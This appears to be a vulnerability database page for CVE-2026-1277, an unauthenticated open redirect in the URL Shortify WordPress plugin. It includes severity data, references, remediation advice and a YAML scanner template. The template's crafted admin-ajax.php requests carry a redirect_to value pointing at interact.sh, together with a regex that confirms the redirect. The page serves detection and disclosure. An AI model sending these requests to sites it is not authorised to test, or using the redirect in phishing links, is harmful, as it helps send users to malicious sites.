/Vulnerability Library

URL Shortify <= 1.12.1 - Open Redirect

CVE-2026-1277
Verified

Description

The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.

Severity

Medium

CVSS Score

4.7

Exploit Probability

1%

Published Date

March 16, 2026

Template Author

shivam kamboj

CVE-2026-1277.yaml
id: CVE-2026-1277

info:
  name: URL Shortify <= 1.12.1 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.
  impact: |
    Unauthenticated attackers can redirect users to malicious sites, facilitating phishing or malware distribution.
  remediation: |
    Update to the latest version beyond 1.12.1.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify/url-shortify-1121-unauthenticated-open-redirect-via-redirect-to-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1277
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2026-1277
    epss-score: 0.00592
    epss-percentile: 0.44031
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/url-shortify/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,url-shortify,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=bfcm_2025_offer&redirect_to=https://interact.sh"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=welcome_offer&redirect_to=https://interact.sh"

    stop-at-first-match: true

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 4a0a00473045022100e8378a6334b829ac55b5144341c8360d0971979915449e54977460294af48de1022003cd91ae60abb4e7d51ece4e9acbdf5c1fc37128c82058e1fd46d14e7482416e:922c64590222798bb761d5b6d8e72950
4.7Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVE ID:
cve-2026-1277
CWE ID:
cwe-601

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify/url-shortify-1121-unauthenticated-open-redirect-via-redirect-to-parameterhttps://nvd.nist.gov/vuln/detail/CVE-2026-1277

Remediation Steps

Update to the latest version beyond 1.12.1.